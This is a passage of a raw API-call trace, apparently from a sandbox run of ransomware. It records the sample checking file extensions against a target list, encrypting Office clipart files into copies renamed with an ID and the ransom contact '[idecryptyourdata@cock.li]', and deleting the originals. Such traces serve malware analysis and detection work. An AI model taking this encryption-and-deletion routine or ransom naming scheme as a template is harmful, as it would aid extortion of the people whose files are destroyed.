lpString2=".WMF") returned -1 [0183.978] lstrlenW (lpString=".xls") returned 4 [0183.978] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.978] lstrlenW (lpString=".xlsx") returned 5 [0183.978] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0183.978] lstrlenW (lpString=".ppt") returned 4 [0183.978] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107350.WMF") returned 68 [0183.978] lstrlenW (lpString=".zip") returned 4 [0183.978] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.978] lstrlenW (lpString=".rar") returned 4 [0183.978] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.979] lstrlenW (lpString=".bz2") returned 4 [0183.979] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.979] lstrlenW (lpString=".7z") returned 3 [0183.979] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107350.WMF") returned 68 [0183.979] lstrlenW (lpString=".dbf") returned 4 [0183.979] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107350.WMF") returned 68 [0183.979] lstrlenW (lpString=".1cd") returned 4 [0183.979] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107350.WMF") returned 68 [0183.979] lstrlenW (lpString=".jpg") returned 4 [0183.979] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107350.WMF") returned 68 [0183.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107350.WMF") returned 68 [0183.979] lstrlenW (lpString=".doc") returned 4 [0183.979] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.979] lstrlenW (lpString=".docx") returned 5 [0183.979] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0183.979] lstrlenW (lpString=".pdf") returned 4 [0183.979] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.979] lstrlenW (lpString=".xls") returned 4 [0183.979] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.979] lstrlenW (lpString=".xlsx") returned 5 [0183.979] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0183.979] lstrlenW (lpString=".ppt") returned 4 [0183.979] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107350.WMF") returned 68 [0183.980] lstrlenW (lpString=".zip") returned 4 [0183.980] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.980] lstrlenW (lpString=".rar") returned 4 [0183.980] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.980] lstrlenW (lpString=".bz2") returned 4 [0183.980] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.980] lstrlenW (lpString=".7z") returned 3 [0183.980] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107350.WMF") returned 68 [0183.980] lstrlenW (lpString=".dbf") returned 4 [0183.980] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107350.WMF") returned 68 [0183.980] lstrlenW (lpString=".1cd") returned 4 [0183.980] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107350.WMF") returned 68 [0183.980] lstrlenW (lpString=".jpg") returned 4 [0183.980] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.980] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0183.980] lstrlenW (lpString="J0107358.WMF") returned 12 [0183.980] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107358.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107358.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0183.981] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=7964) returned 1 [0183.981] CloseHandle (hObject=0x334) returned 1 [0183.981] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107358.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107358.wmf")) returned 0x220 [0183.981] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107358.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107358.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0183.981] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107358.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107358.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0183.982] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.982] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.982] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107358.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107358.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0183.983] GetLastError () returned 0x0 [0183.983] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x1f1c, lpOverlapped=0x0) returned 1 [0183.999] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x1f20, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x1f20, lpOverlapped=0x0) returned 1 [0184.288] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.288] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0184.288] SetEndOfFile (hFile=0x380) returned 1 [0184.289] CloseHandle (hObject=0x380) returned 1 [0184.289] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.289] SetEndOfFile (hFile=0x334) returned 1 [0184.290] CloseHandle (hObject=0x334) returned 1 [0184.290] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107358.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.290] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107358.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107358.wmf")) returned 1 [0184.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107358.WMF") returned 68 [0184.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107358.WMF") returned 68 [0184.290] lstrlenW (lpString=".doc") returned 4 [0184.290] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.290] lstrlenW (lpString=".docx") returned 5 [0184.291] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0184.291] lstrlenW (lpString=".pdf") returned 4 [0184.291] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.291] lstrlenW (lpString=".xls") returned 4 [0184.291] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.291] lstrlenW (lpString=".xlsx") returned 5 [0184.291] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0184.291] lstrlenW (lpString=".ppt") returned 4 [0184.291] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.291] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107358.WMF") returned 68 [0184.291] lstrlenW (lpString=".zip") returned 4 [0184.291] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.291] lstrlenW (lpString=".rar") returned 4 [0184.291] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.291] lstrlenW (lpString=".bz2") returned 4 [0184.291] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.291] lstrlenW (lpString=".7z") returned 3 [0184.291] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.291] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107358.WMF") returned 68 [0184.291] lstrlenW (lpString=".dbf") returned 4 [0184.291] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.291] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107358.WMF") returned 68 [0184.291] lstrlenW (lpString=".1cd") returned 4 [0184.291] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.291] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107358.WMF") returned 68 [0184.291] lstrlenW (lpString=".jpg") returned 4 [0184.291] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.291] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107358.WMF") returned 68 [0184.291] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107358.WMF") returned 68 [0184.292] lstrlenW (lpString=".doc") returned 4 [0184.292] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.292] lstrlenW (lpString=".docx") returned 5 [0184.292] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0184.292] lstrlenW (lpString=".pdf") returned 4 [0184.292] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.292] lstrlenW (lpString=".xls") returned 4 [0184.292] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.292] lstrlenW (lpString=".xlsx") returned 5 [0184.292] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0184.292] lstrlenW (lpString=".ppt") returned 4 [0184.292] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107358.WMF") returned 68 [0184.292] lstrlenW (lpString=".zip") returned 4 [0184.292] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.292] lstrlenW (lpString=".rar") returned 4 [0184.292] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.292] lstrlenW (lpString=".bz2") returned 4 [0184.292] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.292] lstrlenW (lpString=".7z") returned 3 [0184.292] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107358.WMF") returned 68 [0184.292] lstrlenW (lpString=".dbf") returned 4 [0184.292] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107358.WMF") returned 68 [0184.292] lstrlenW (lpString=".1cd") returned 4 [0184.292] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107358.WMF") returned 68 [0184.293] lstrlenW (lpString=".jpg") returned 4 [0184.293] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.293] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0184.293] lstrlenW (lpString="J0107488.WMF") returned 12 [0184.293] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107488.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107488.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0184.294] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=8000) returned 1 [0184.294] CloseHandle (hObject=0x334) returned 1 [0184.294] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107488.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107488.wmf")) returned 0x220 [0184.294] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107488.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107488.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.294] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107488.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107488.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0184.294] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.294] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.294] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107488.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107488.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0184.295] GetLastError () returned 0x0 [0184.295] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x1f40, lpOverlapped=0x0) returned 1 [0184.297] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x1f50, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x1f50, lpOverlapped=0x0) returned 1 [0184.298] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.298] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0184.298] SetEndOfFile (hFile=0x380) returned 1 [0184.299] CloseHandle (hObject=0x380) returned 1 [0184.299] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.299] SetEndOfFile (hFile=0x334) returned 1 [0184.300] CloseHandle (hObject=0x334) returned 1 [0184.300] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107488.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.300] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107488.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107488.wmf")) returned 1 [0184.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107488.WMF") returned 68 [0184.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107488.WMF") returned 68 [0184.301] lstrlenW (lpString=".doc") returned 4 [0184.301] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.301] lstrlenW (lpString=".docx") returned 5 [0184.301] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0184.301] lstrlenW (lpString=".pdf") returned 4 [0184.301] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.301] lstrlenW (lpString=".xls") returned 4 [0184.301] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.301] lstrlenW (lpString=".xlsx") returned 5 [0184.301] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0184.301] lstrlenW (lpString=".ppt") returned 4 [0184.301] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107488.WMF") returned 68 [0184.301] lstrlenW (lpString=".zip") returned 4 [0184.301] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.301] lstrlenW (lpString=".rar") returned 4 [0184.301] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.301] lstrlenW (lpString=".bz2") returned 4 [0184.301] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.301] lstrlenW (lpString=".7z") returned 3 [0184.301] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107488.WMF") returned 68 [0184.301] lstrlenW (lpString=".dbf") returned 4 [0184.301] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107488.WMF") returned 68 [0184.301] lstrlenW (lpString=".1cd") returned 4 [0184.301] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107488.WMF") returned 68 [0184.301] lstrlenW (lpString=".jpg") returned 4 [0184.301] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107488.WMF") returned 68 [0184.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107488.WMF") returned 68 [0184.302] lstrlenW (lpString=".doc") returned 4 [0184.302] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.302] lstrlenW (lpString=".docx") returned 5 [0184.302] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0184.302] lstrlenW (lpString=".pdf") returned 4 [0184.302] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.302] lstrlenW (lpString=".xls") returned 4 [0184.302] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.302] lstrlenW (lpString=".xlsx") returned 5 [0184.302] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0184.302] lstrlenW (lpString=".ppt") returned 4 [0184.302] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107488.WMF") returned 68 [0184.302] lstrlenW (lpString=".zip") returned 4 [0184.302] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.302] lstrlenW (lpString=".rar") returned 4 [0184.302] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.302] lstrlenW (lpString=".bz2") returned 4 [0184.302] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.302] lstrlenW (lpString=".7z") returned 3 [0184.302] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107488.WMF") returned 68 [0184.302] lstrlenW (lpString=".dbf") returned 4 [0184.302] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107488.WMF") returned 68 [0184.302] lstrlenW (lpString=".1cd") returned 4 [0184.303] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.303] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107488.WMF") returned 68 [0184.303] lstrlenW (lpString=".jpg") returned 4 [0184.303] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.303] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0184.303] lstrlenW (lpString="J0107490.WMF") returned 12 [0184.303] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107490.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107490.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0184.304] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=16468) returned 1 [0184.304] CloseHandle (hObject=0x334) returned 1 [0184.304] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107490.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107490.wmf")) returned 0x220 [0184.304] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107490.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107490.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.304] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107490.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107490.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0184.304] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.304] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.304] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107490.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107490.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0184.305] GetLastError () returned 0x0 [0184.305] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x4054, lpOverlapped=0x0) returned 1 [0184.307] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x4060, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x4060, lpOverlapped=0x0) returned 1 [0184.309] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.309] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0184.309] SetEndOfFile (hFile=0x380) returned 1 [0184.309] CloseHandle (hObject=0x380) returned 1 [0184.309] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.309] SetEndOfFile (hFile=0x334) returned 1 [0184.311] CloseHandle (hObject=0x334) returned 1 [0184.311] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107490.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.311] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107490.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107490.wmf")) returned 1 [0184.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107490.WMF") returned 68 [0184.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107490.WMF") returned 68 [0184.311] lstrlenW (lpString=".doc") returned 4 [0184.311] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.312] lstrlenW (lpString=".docx") returned 5 [0184.312] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0184.312] lstrlenW (lpString=".pdf") returned 4 [0184.312] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.312] lstrlenW (lpString=".xls") returned 4 [0184.312] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.312] lstrlenW (lpString=".xlsx") returned 5 [0184.312] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0184.312] lstrlenW (lpString=".ppt") returned 4 [0184.312] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.312] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107490.WMF") returned 68 [0184.312] lstrlenW (lpString=".zip") returned 4 [0184.312] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 